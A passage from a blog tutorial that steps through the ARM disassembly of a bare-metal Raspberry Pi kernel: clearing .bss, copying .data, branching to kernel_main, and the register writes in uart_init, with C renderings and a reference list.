- <a href="http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.dui0041c/Babbfdih.html">http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.dui0041c/Babbfdih.html </a></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
This code is pretty straightforward then: it loads the addresses of the labels <span style="font-family: "courier new" , "courier" , monospace;">__bss_start</span> and <span style="font-family: "courier new" , "courier" , monospace;">__bss_end</span> into registers <span style="font-family: "courier new" , "courier" , monospace;">r4 </span>and <span style="font-family: "courier new" , "courier" , monospace;">r9 </span>respectively. It then zeroes registers <span style="font-family: "courier new" , "courier" , monospace;">r5-r8</span>. After all this it issues a <span style="font-family: "courier new" , "courier" , monospace;">b 2f </span>instruction, which branches unconditionally to local label <span style="font-family: "courier new" , "courier" , monospace;">2</span> (the <span style="font-family: "courier new" , "courier" , monospace;">f</span> suffix means "the nearest label 2 searching forward") and starts executing there. We can confirm this by looking at the disassembly: </div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVn7KaPIA0XpChRMXiZcCZj-1wXoihgADgJ7TVPSlKrOON8fn3daPpEADlcG68_7EW7D5kMFDCfcCnuradcDhxoDCx4b9r-StrsEDv8Hl6OeZkIzZGyUnpNsje_E9i2G_tHOQWr8o6GyI/s1600/bl2f.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="154" data-original-width="663" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVn7KaPIA0XpChRMXiZcCZj-1wXoihgADgJ7TVPSlKrOON8fn3daPpEADlcG68_7EW7D5kMFDCfcCnuradcDhxoDCx4b9r-StrsEDv8Hl6OeZkIzZGyUnpNsje_E9i2G_tHOQWr8o6GyI/s1600/bl2f.PNG" /></a></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
The instruction at <span style="font-family: "courier new" , "courier" , monospace;">802c</span>, <span style="font-family: "courier new" , "courier" , monospace;">b 8034 &lt;__start+0x34&gt;</span>, shows that it will branch to the <span style="font-family: "courier new" , "courier" , monospace;">cmp r4,r9</span> instruction, which according to <span style="font-family: "courier new" , "courier" , monospace;">boot.S</span> is the first instruction under label <span style="font-family: "courier new" , "courier" , monospace;">2</span>. After the comparison comes a conditional branch: as long as <span style="font-family: "courier new" , "courier" , monospace;">r4</span> is still below <span style="font-family: "courier new" , "courier" , monospace;">r9</span> (a <span style="font-family: "courier new" , "courier" , monospace;">blo</span>, "branch if lower"), it repeats the loop by branching back to <span style="font-family: "courier new" , "courier" , monospace;">_start+0x30</span>, which holds this instruction:</div>
<div style="text-align: left;">
<br /></div>
<blockquote class="tr_bq" style="text-align: left;">
<blockquote class="tr_bq">
<span style="background-color: white; color: #24292e; font-family: "courier new" , "courier" , monospace; white-space: pre;">stmia r4!,{r5-r8}</span></blockquote>
</blockquote>
<div style="text-align: left;">
The <span style="font-family: "courier new" , "courier" , monospace;">stm </span>(store multiple) instruction stores the registers listed in the braces (<i>here r5 through r8, four 32-bit registers for a total of 16 bytes</i>) contiguously to memory, starting at the address held in the base register, <span style="font-family: "courier new" , "courier" , monospace;">r4</span>. The <span style="font-family: "courier new" , "courier" , monospace;">ia </span>suffix stands for "increment after": each register is written at the current address, and the address is incremented after each store. The exclamation mark requests write-back, so the final address (the old <span style="font-family: "courier new" , "courier" , monospace;">r4 </span>plus 16) is written back into <span style="font-family: "courier new" , "courier" , monospace;">r4</span>. This allows us to slam 16 bytes of zeroes into memory per iteration.<br />
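<div>
To make the control flow explicit, here is a rough C rendering of the whole bss-clearing loop. It is only an illustration (the real thing has to run in assembly, before any C code); the function name is hypothetical, and <i>start</i>/<i>end</i> stand in for __bss_start and __bss_end.</div>

```c
#include <stdint.h>

/*
 * Hypothetical C rendering of the boot.S loop:
 *   r4 = start (__bss_start), r9 = end (__bss_end), r5-r8 = 0
 *   b 2f                 -> test the condition before the first store
 *   1: stmia r4!, {r5-r8}
 *   2: cmp r4, r9 ; blo 1b
 */
void clear_bss(uint32_t *start, const uint32_t *end)
{
    uint32_t *p = start;            /* r4 */
    const uint32_t zero = 0;        /* r5, r6, r7, r8 */

    /* Jumping straight to label 2 makes this a test-first (while) loop,
       so an empty region (start == end) is never written. */
    while (p < end) {               /* cmp r4, r9 ; blo 1b */
        /* stmia r4!, {r5-r8}: four consecutive words (16 bytes),
           then write-back moves the base pointer past them. */
        p[0] = zero;
        p[1] = zero;
        p[2] = zero;
        p[3] = zero;
        p += 4;
    }
    /* Like the assembly, this writes whole 16-byte chunks, so a region
       whose size is not a multiple of 16 would be overshot. */
}
```

<div>
The b 2f at the top is what turns the loop into a while loop rather than a do-while: without it, an empty .bss would still get one 16-byte store.</div>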
<br />
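What's happening here may seem odd, but it's pretty standard practice for cleaning out memory sections in order to prep a C runtime: C requires global and static variables without an initializer to start out as zero, those variables live in .bss, and so the startup code has to zero that region before any C code runs. Here are some examples from other people's Raspberry Pi kernels. This one also cleans out the bss, and you can see it does some other C/C++ runtime prep too:<br />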
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMfDw6uHKso3LDPLibNwBZLZS8giBvGJLUCBjeituKJ4_KnItJ3h2IAmRaX3QWbYvkNOUDbMY4nSZeeRWZ63fGvQGuzkmCYem6zzA0IlL3Htmlymyur5LTe6Whym1vwn_jnsGCN5w-zGk/s1600/init_data_bss.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="637" data-original-width="658" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMfDw6uHKso3LDPLibNwBZLZS8giBvGJLUCBjeituKJ4_KnItJ3h2IAmRaX3QWbYvkNOUDbMY4nSZeeRWZ63fGvQGuzkmCYem6zzA0IlL3Htmlymyur5LTe6Whym1vwn_jnsGCN5w-zGk/s1600/init_data_bss.PNG" /></a></div>
<br />
<br />
The code in the section labeled "<i>Initialize the .data section</i>" copies data out of memory using an <span style="font-family: "courier new" , "courier" , monospace;">ldrlo </span>instruction (an <span style="font-family: "courier new" , "courier" , monospace;">ldr </span>that only executes when the preceding comparison came out "lower"), which reads 4 bytes from the address <span style="font-family: "courier new" , "courier" , monospace;">[r1]</span>; we can see <span style="font-family: "courier new" , "courier" , monospace;">r1 </span>is initialized to <span style="font-family: "courier new" , "courier" , monospace;">__data_init_start</span>. It then immediately stores those bytes to the memory address <span style="font-family: "courier new" , "courier" , monospace;">[r2]</span> using the matching <span style="font-family: "courier new" , "courier" , monospace;">strlo </span>operation. This is a very similar structure to what we are doing. The post "Building Bare-Metal ARM Systems with GNU" shows some more: <a href="https://www.embedded.com/design/mcus-processors-and-socs/4026075/Building-Bare-Metal-ARM-Systems-with-GNU-Part-2">https://www.embedded.com/design/mcus-processors-and-socs/4026075/Building-Bare-Metal-ARM-Systems-with-GNU-Part-2</a><br />
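<div>
A copy like this is typically needed when a section's initial values are stored at one address in the image but the section lives at a different address at run time. As a rough sketch, the loop reads like the C below. The function and parameter names are hypothetical; <i>end</i> in particular stands in for whatever end-of-section symbol that kernel compares against, which isn't spelled out in the text here.</div>

```c
#include <stdint.h>

/*
 * Hypothetical C rendering of an "initialize .data" loop.
 * src: initial values in the image (r1, starting at __data_init_start)
 * dst: run-time location of .data (r2)
 * end: assumed end-of-.data marker the loop compares against
 */
void init_data(const uint32_t *src, uint32_t *dst, const uint32_t *end)
{
    /* The "lo" condition on ldrlo/strlo: keep copying while dst < end. */
    while (dst < end) {
        /* ldrlo: read 4 bytes from [r1]; strlo: write them to [r2];
           both pointers then move on to the next word. */
        *dst++ = *src++;
    }
}
```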
<br />
Okay, so let's say we are done setting up our C runtime. The next thing boot.S does is branch to the kernel like so:<br />
<br />
<blockquote class="tr_bq">
<span style="font-family: "courier new" , "courier" , monospace;">ldr r3,=kernel_main<br />blx r3</span></blockquote>
<br />
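The blx instruction is pretty important: it means branch with link and exchange. It saves the return address in the link register (lr) and transfers control to the kernel's main function. The "exchange" part means that, when the target comes from a register, bit 0 of that address selects whether execution continues in ARM or Thumb state.<br />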
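<div>
To make the "link" and "exchange" parts concrete, here is a small C model of a blx Rm executed in ARM state: the return address is the instruction after the blx, and bit 0 of the register picks the instruction set. This is a hypothetical illustration of the architectural behaviour (the struct and function names are made up), not something boot.S contains.</div>

```c
#include <stdbool.h>
#include <stdint.h>

/* Hypothetical model of the effect of `blx Rm` executed in ARM state. */
typedef struct {
    uint32_t pc;     /* where execution continues */
    uint32_t lr;     /* return address saved by the "link" part */
    bool     thumb;  /* instruction set chosen by the "exchange" part */
} blx_effect;

blx_effect blx_register(uint32_t rm, uint32_t blx_addr)
{
    blx_effect e;
    e.lr    = blx_addr + 4;     /* ARM instructions are 4 bytes: return to the next one */
    e.thumb = (rm & 1u) != 0;   /* bit 0 set -> Thumb, clear -> ARM */
    e.pc    = rm & ~1u;         /* bit 0 is cleared before it reaches the PC */
    return e;
}
```

<div>
Loading the address with ldr r3,=kernel_main and branching through the register means the compiler's choice of ARM or Thumb code for kernel_main is honoured automatically.</div>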
<br />
<h2 style="text-align: left;">
Reverse Engineering Basic UART I/O initialization </h2>
<br />
Once it branches into the kernel, it passes it a couple of arguments; one of these is the location of the atags structure in memory. I will perhaps get into that in a later post, but what I want to focus on here is how the uart_init and kernel_main functions look at the assembler level.<br />
<br />
Here's the kernel main:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQ-msDFR4AiqYtO44VmyMyrbpYisVtqzHqupSLR1ytMLTl3f3hoQ2KfCWkZf9DHactiB-iNKLirQ-j_LIIPawyvd4PVQFW5ljvtIrxlFUJURaKvbKZ5lTACJbxzJcekMrdn8_VwXzV3ic/s1600/2-kernel_main-objdump.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="270" data-original-width="810" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQ-msDFR4AiqYtO44VmyMyrbpYisVtqzHqupSLR1ytMLTl3f3hoQ2KfCWkZf9DHactiB-iNKLirQ-j_LIIPawyvd4PVQFW5ljvtIrxlFUJURaKvbKZ5lTACJbxzJcekMrdn8_VwXzV3ic/s1600/2-kernel_main-objdump.PNG" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
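Let's break this down. The first instruction is a push to preserve the <span style="font-family: Courier New, Courier, monospace;">r4 </span>and link registers. According to the sources I have here, <span style="font-family: Courier New, Courier, monospace;">r4 </span>is saved because it holds the <span style="font-family: Courier New, Courier, monospace;">atags </span>start address, which is passed to the kernel on start. (<span style="font-family: Courier New, Courier, monospace;">r4 </span>is also a callee-saved register under the ARM procedure call standard, and the link register has to be saved because <span style="font-family: Courier New, Courier, monospace;">kernel_main </span>goes on to call other functions.) What happens next is that the kernel branches immediately to <span style="font-family: Courier New, Courier, monospace;">uart_init</span>, which looks like this:<br />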
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIJmeh3m-r3lgAuBzLwD5jdUu4e1ZiAYugRogZDRRbP8QRzjIQzukpMRfWn4Vlkso3LYsYhd5qIMRWKvzrgPaJKYU0uraYZP9WWVnQ5SFOY5WvHD4kbTUzuBkCcsLtx-T-NX_8dhmnCkQ/s1600/uart_init.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="201" data-original-width="657" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIJmeh3m-r3lgAuBzLwD5jdUu4e1ZiAYugRogZDRRbP8QRzjIQzukpMRfWn4Vlkso3LYsYhd5qIMRWKvzrgPaJKYU0uraYZP9WWVnQ5SFOY5WvHD4kbTUzuBkCcsLtx-T-NX_8dhmnCkQ/s1600/uart_init.PNG" /></a></div>
<br />
<br />
This doesn't look like too much of a monster; all it does is essentially shuffle some values around. The first instruction puts a 0 into <span style="font-family: Courier New, Courier, monospace;">r1</span>, which is being used as a placeholder for 0 and also clears it for later use. The next two instructions construct a base address from the GPIO enum. They do this by first putting <span style="font-family: Courier New, Courier, monospace;">0x1000 </span>in the bottom half of <span style="font-family: Courier New, Courier, monospace;">r3 </span>and then using a <span style="font-family: Courier New, Courier, monospace;">movt </span>to write <span style="font-family: Courier New, Courier, monospace;">0x3f20 </span>into the top half. Here's the documentation on the <span style="font-family: Courier New, Courier, monospace;">movt </span>instruction:<br />
<br />
<div class="sect2" lang="en" style="font-family: Verdana, Tahoma, Arial, Helvetica, sans-serif; font-size: small; margin-bottom: 0.2em !important; margin-top: 0.4em !important;" xml:lang="en">
<div class="titlepage">
<div>
</div>
</div>
<div style="margin-bottom: 0.2em !important; margin-top: 0.4em !important;">
Move Top. Writes a 16-bit immediate value to the top halfword of a register, without affecting the bottom halfword.</div>
<div class="sect3" lang="en" xml:lang="en">
<div class="titlepage">
<h4 class="title" style="clear: both; font-size: 1.1em; margin-bottom: 0px; margin-top: 1.2em;">
Syntax</h4>
</div>
<pre class="synopsis" style="color: #333399; font-family: "Lucida Sans Typewriter", "Courier New", Courier, monospace; font-size: 0.9em; margin-bottom: 0.2em !important; margin-left: 0.5em; margin-top: 0.4em !important;">MOVT{<em class="replaceable"><code style="color: inherit; font-family: inherit; font-size: 11.7px;">cond</code></em>} <em class="replaceable"><code style="color: inherit; font-family: inherit; font-size: 11.7px;">Rd</code></em>, #<em class="replaceable"><code style="color: inherit; font-family: inherit; font-size: 11.7px;">immed_16</code></em></pre>
</div>
</div>
Pretty useful stuff: it gives you some flexibility in shuffling around byte values, letting you build a full 32-bit constant out of two 16-bit halves. So it makes <span style="font-family: Courier New, Courier, monospace;">r3 </span>hold the value <span style="font-family: Courier New, Courier, monospace;">0x3f201000</span>, which we know from the code is the <span style="font-family: Courier New, Courier, monospace;">UART_BASE </span>address:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzSn2ETh11H4G3q8bqoyE3_0Po9s73uDdiF3yBNnP7ftAPPxL570EHdRSxTbasKT_AOTyENslIgd8pCJ94q8PJgHOQKzEsozeT-g0hfAv9MkFnV2tj9jlpIJRBYMUKkLGUY0w4dyooDC8/s1600/uart_base.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="138" data-original-width="364" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzSn2ETh11H4G3q8bqoyE3_0Po9s73uDdiF3yBNnP7ftAPPxL570EHdRSxTbasKT_AOTyENslIgd8pCJ94q8PJgHOQKzEsozeT-g0hfAv9MkFnV2tj9jlpIJRBYMUKkLGUY0w4dyooDC8/s1600/uart_base.PNG" /></a></div>
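<div>
The two-step construction of 0x3f201000 can be modelled in a few lines of C. This sketch assumes the instruction that puts 0x1000 in the bottom half behaves like movw (or a plain mov with an immediate), which also clears the top halfword; the movw/movt C functions are hypothetical stand-ins for the instructions.</div>

```c
#include <stdint.h>

/* Model of movw Rd, #imm16: write imm16 to the bottom halfword, zero the top. */
uint32_t movw(uint32_t imm16)
{
    return imm16 & 0xFFFFu;
}

/* Model of movt Rd, #imm16: write imm16 to the top halfword,
   leaving the bottom halfword of Rd untouched. */
uint32_t movt(uint32_t rd, uint32_t imm16)
{
    return (rd & 0x0000FFFFu) | ((imm16 & 0xFFFFu) << 16);
}
```

<div>
For example, movt(movw(0x1000), 0x3f20) yields 0x3f201000, the value that ends up in r3. Building constants this way avoids loading them from a literal pool in memory.</div>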
Then it sets up another address from the GPIO <span style="font-family: Courier New, Courier, monospace;">enum</span>, this time using <span style="font-family: Courier New, Courier, monospace;">r1 </span>(which ends up pointing to <span style="font-family: Courier New, Courier, monospace;">GPIO_BASE</span> via another <span style="font-family: Courier New, Courier, monospace;">movt</span>). It also moves a value into <span style="font-family: Courier New, Courier, monospace;">r2</span>, but I suspect this will only make sense later on, so let's skip it for now. With those two pointers set up, it performs a str instruction that takes the value in <span style="font-family: Courier New, Courier, monospace;">r0</span>, which is 0, and writes it to <span style="font-family: Courier New, Courier, monospace;">r3+0x30</span>, which is <span style="font-family: Courier New, Courier, monospace;">UART_CR</span>. If we look at the code again, this is exactly what it's doing: setting the register at address <span style="font-family: Courier New, Courier, monospace;">UART_CR </span>to 0:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQVmNdjwAustOz8IqALHXsruwbU0t4S3KhQjWVm0TKZbas2D1pLR5RSat_8uS72onAiNme7_t51HBb8vVWu55kvoL157gPNdM-_AQstBGBDV1hntu_MxkO3CGZOn8_HQacEiJUGJ06OA8/s1600/uart_init.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="68" data-original-width="357" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQVmNdjwAustOz8IqALHXsruwbU0t4S3KhQjWVm0TKZbas2D1pLR5RSat_8uS72onAiNme7_t51HBb8vVWu55kvoL157gPNdM-_AQstBGBDV1hntu_MxkO3CGZOn8_HQacEiJUGJ06OA8/s1600/uart_init.PNG" /></a></div>
<br />
<br />
The same goes for the <span style="font-family: Courier New, Courier, monospace;">str </span>through r1, of course. We know <span style="font-family: Courier New, Courier, monospace;">r1 </span>points to <span style="font-family: Courier New, Courier, monospace;">GPIO_BASE</span>, and the <span style="font-family: Courier New, Courier, monospace;">str </span>writes to<span style="font-family: Courier New, Courier, monospace;"> r1+0x94</span>, which is <span style="font-family: Courier New, Courier, monospace;">GPPUD</span>.<br />
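<div>
Putting the addresses from this walkthrough together, the two stores correspond to C along these lines. This is a sketch under assumptions: GPIO_BASE is taken to be 0x3f200000 (the GPIO block on the BCM2836/BCM2837 used by the Pi 2 and 3, consistent with UART_BASE sitting 0x1000 above it), the offsets 0x30 and 0x94 come from the disassembly above, and mmio_write and uart_init_first_writes are hypothetical helper names, not necessarily what this kernel's source uses.</div>

```c
#include <stdint.h>

/* Only the registers discussed above (hypothetical subset of the enum). */
enum {
    GPIO_BASE = 0x3F200000,
    GPPUD     = GPIO_BASE + 0x94,    /* GPIO pull-up/down control */
    UART_BASE = GPIO_BASE + 0x1000,  /* 0x3F201000, built with movt */
    UART_CR   = UART_BASE + 0x30,    /* UART control register */
};

/* A volatile store, so the compiler cannot drop the write or reorder it
   against other volatile accesses: one `str rX, [rY, #offset]`. */
static inline void mmio_write(uintptr_t reg, uint32_t data)
{
    *(volatile uint32_t *)reg = data;
}

/* The first two writes of uart_init as walked through above.
   Only meaningful on the target board, never call this on a host. */
void uart_init_first_writes(void)
{
    mmio_write(UART_CR, 0);  /* str r0, [r3, #0x30]: clear UART_CR */
    mmio_write(GPPUD, 0);    /* str r0, [r1, #0x94]: clear GPPUD */
}
```

<div>
The volatile cast is the important part: without it, the compiler is free to treat these as ordinary memory writes and merge or remove them, which is exactly what you don't want for device registers.</div>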
<br />
Okay, the rest of the kernel's operations are really no different from this; they just perform writes to different offsets. If you'd like to git gud at reverse engineering these kinds of functions, try reversing the rest of the kernel, then look for other kernels that do something similar and see if you can work out how and where they do it. Have fun! </div>
<h2 style="text-align: left;">
Reading and references</h2>
<br />
<ul style="text-align: left;">
<li>Raspberry Pi Bare Bones (OSDev wiki) <a href="https://wiki.osdev.org/Raspberry_Pi_Bare_Bones">https://wiki.osdev.org/Raspberry_Pi_Bare_Bones</a> </li>
<li>vectors.s <a href="https://github.com/dwelch67/raspberrypi/blob/master/boards/cpuid/vectors.s">https://github.com/dwelch67/raspberrypi/blob/master/boards/cpuid/vectors.s</a> </li>
<li>Build your own OS using the Raspberry Pi (TechRepublic) <a href="https://www.techrepublic.com/blog/european-technology/build-your-own-os-using-the-raspberry-pi/">https://www.techrepublic.com/blog/european-technology/build-your-own-os-using-the-raspberry-pi/</a> </li>
<li><a href="https://jsandler18.github.io/">https://jsandler18.github.io/</a> </li>
<li><a href="http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.dui0068b/CIHEEIDJ.html">http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.dui0068b/CIHEEIDJ.html</a> </li>
<li><a href="http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.ddi0464e/CHDGECEI.html">http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.ddi0464e/CHDGECEI.html</a> </li>
<li><a href="http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.ddi0360f/CHDGIJFB.html">http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.ddi0360f/CHDGIJFB.html</a> </li>
<li>c0 Main ID Register <a href="http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.ddi0360f/I65012.html">http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.ddi0360f/I65012.html</a> </li>
<li>Load Register Byte <a href="http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.dui0802a/LDRB_imm.html">http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.dui0802a/LDRB_imm.html</a> </li>
<li>BCM2835 Specifications <a href="https://www.raspberrypi.org/documentation/hardware/raspberrypi/bcm2835/README.md">https://www.raspberrypi.org/documentation/hardware/raspberrypi/bcm2835/README.md</a> </li>
<li>ARM11 Technical Reference Manual <a href="http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.ddi0301h/index.html">http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.ddi0301h/index.html</a> </li>
<li>c0 Coprocessor Registers <a href="http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.ddi0464f/index.html">http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.ddi0464f/index.html</a> </li>
</ul>
</div>
</div>
Keith Makanhttp://www.blogger.com/profile/10220395050030522020noreply@blogger.com0